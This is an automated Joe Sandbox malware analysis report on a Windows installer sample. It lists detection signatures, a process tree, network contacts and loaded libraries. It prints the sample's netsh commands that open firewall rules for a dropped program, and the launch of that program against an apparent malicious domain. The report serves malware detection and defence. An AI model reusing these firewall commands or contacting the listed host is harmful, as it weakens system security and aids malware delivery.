Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KYagm8gq5S.exe

Overview

General Information

Sample name:KYagm8gq5S.exe
renamed because original name is a hash value
Original sample name:59586c94ee121385d362a60382217b4e.exe
Analysis ID:1581896
MD5:59586c94ee121385d362a60382217b4e
SHA1:816f6785f139eabe477a15023ccc7cff17790763
SHA256:f27e3367788f7758120c63b9a725e7cb07998ce664b0571a56c8d0b8e05c1ec4
Tags:exeuser-abuse_ch
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Deletes itself after installation
Machine Learning detection for sample
Modifies the windows firewall
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files

Classification

  • System is w10x64
  • KYagm8gq5S.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\KYagm8gq5S.exe" MD5: 59586C94EE121385D362A60382217B4E)
    • netsh.exe (PID: 7288 cmdline: netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • netsh.exe (PID: 7352 cmdline: netsh advfirewall firewall add rule name=nggwslounqxvwf dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • nggwslounqxvwf.exe (PID: 7424 cmdline: "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" "http://www.dantsteinfeld.click" "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1519" MD5: 71923BB5EDAFF27984A1A49095554A5F)
    • explorer.exe (PID: 7440 cmdline: C:\Windows\system32\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exeReversingLabs: Detection: 20%
Source: KYagm8gq5S.exeReversingLabs: Detection: 42%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: KYagm8gq5S.exeJoe Sandbox ML: detected
Source: KYagm8gq5S.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: KYagm8gq5S.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe.0.dr
Source: Binary string: E:\clr\binaries\x86ret\bin\i386\VSSetup\Utils\boxstub.pdb source: dotNetFx45_Full_setup.exe.0.dr
Source: Binary string: boxstub.pdb source: dotNetFx40_Full_setup.exe.0.dr
Source: Binary string: D:\Download\Download\obj\Release\curl.pdb source: nggwslounqxvwf.exe, 00000005.00000000.1694869957.0000000000FD2000.00000002.00000001.01000000.00000005.sdmp, nggwslounqxvwf.exe.0.dr
Source: Binary string: C:\Users\John\Downloads\calculator-winforms-app-main\BasicCalculator\obj\Release\BasicCalculator.pdb source: BasicCalculator1.exe.0.dr
Source: Binary string: C:\Users\John\Downloads\calculator-winforms-app-main\BasicCalculator\obj\Release\BasicCalculator.pdb Q:Q ,Q_CorExeMainmscoree.dll source: BasicCalculator1.exe.0.dr
Source: Binary string: C:\Users\John\Documents\Visual Studio 2022\Projects\App\App\obj\Release\WebView.pdb source: WebView.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe.0.dr
Source: C:\Users\user\Desktop\KYagm8gq5S.exeCode function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C60
Source: C:\Users\user\Desktop\KYagm8gq5S.exeCode function: 0_2_004068B1 FindFirstFileW,FindClose,0_2_004068B1
Source: C:\Users\user\Desktop\KYagm8gq5S.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.dantsteinfeld.clickConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 23.106.59.18 23.106.59.18
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.dantsteinfeld.clickConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: www.dantsteinfeld.click
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: KYagm8gq5S.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
Source: PowerRun64.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PowerRun64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PowerRun64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ppp84k45ss7ehy8ypic5x.limelightcdn.com
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ppp84k45ss7ehy8ypic5x.limelightcdn.comd
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.000000000369E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PowerRun64.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: nggwslounqxvwf.exe, 00000005.00000002.1724753354.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, nggwslounqxvwf.exe, 00000005.00000002.1724753354.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dantsteinfeld.click
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.000000000369E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dantsteinfeld.click/
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.000000000369E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dantsteinfeld.click/t
Source: nggwslounqxvwf.exe, 00000005.00000002.1724753354.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dantsteinfeld.clickC:
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dantsteinfeld.clickT
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dantsteinfeld.clickd
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: WebView.exe.0.drString found in binary or memory: https://google.com
Source: SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com
Source: SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com.
Source: SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: PowerRun64.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\Desktop\KYagm8gq5S.exeCode function: 0_2_00405718 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405718
Source: C:\Users\user\Desktop\KYagm8gq5S.exeCode function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352F
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exe 5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
Source: WebView.exe.0.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameselfdel.dllJ vs KYagm8gq5S.exe
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetACL.exe. vs KYagm8gq5S.exe
Source: KYagm8gq5S.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal76.evad.winEXE@11/23@2/1
Source: C:\Users\user\Desktop\KYagm8gq5S.exeCode function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352F
Source: C:\Users\user\Desktop\KYagm8gq5S.exeCode function: 0_2_004049C4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049C4
Source: C:\Users\user\Desktop\KYagm8gq5S.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nggwslounqxvwf.exe.logJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
Source: C:\Users\user\Desktop\KYagm8gq5S.exeFile created: C:\Users\user\AppData\Local\Temp\nsiFE18.tmpJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
Source: KYagm8gq5S.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\KYagm8gq5S.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: KYagm8gq5S.exeReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\KYagm8gq5S.exeFile read: C:\Users\user\Desktop\KYagm8gq5S.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\KYagm8gq5S.exe "C:\Users\user\Desktop\KYagm8gq5S.exe"
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" "http://www.dantsteinfeld.click" "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1519"
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\explorer.exe
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,privateJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,privateJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" "http://www.dantsteinfeld.click" "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1519"Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\explorer.exeJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
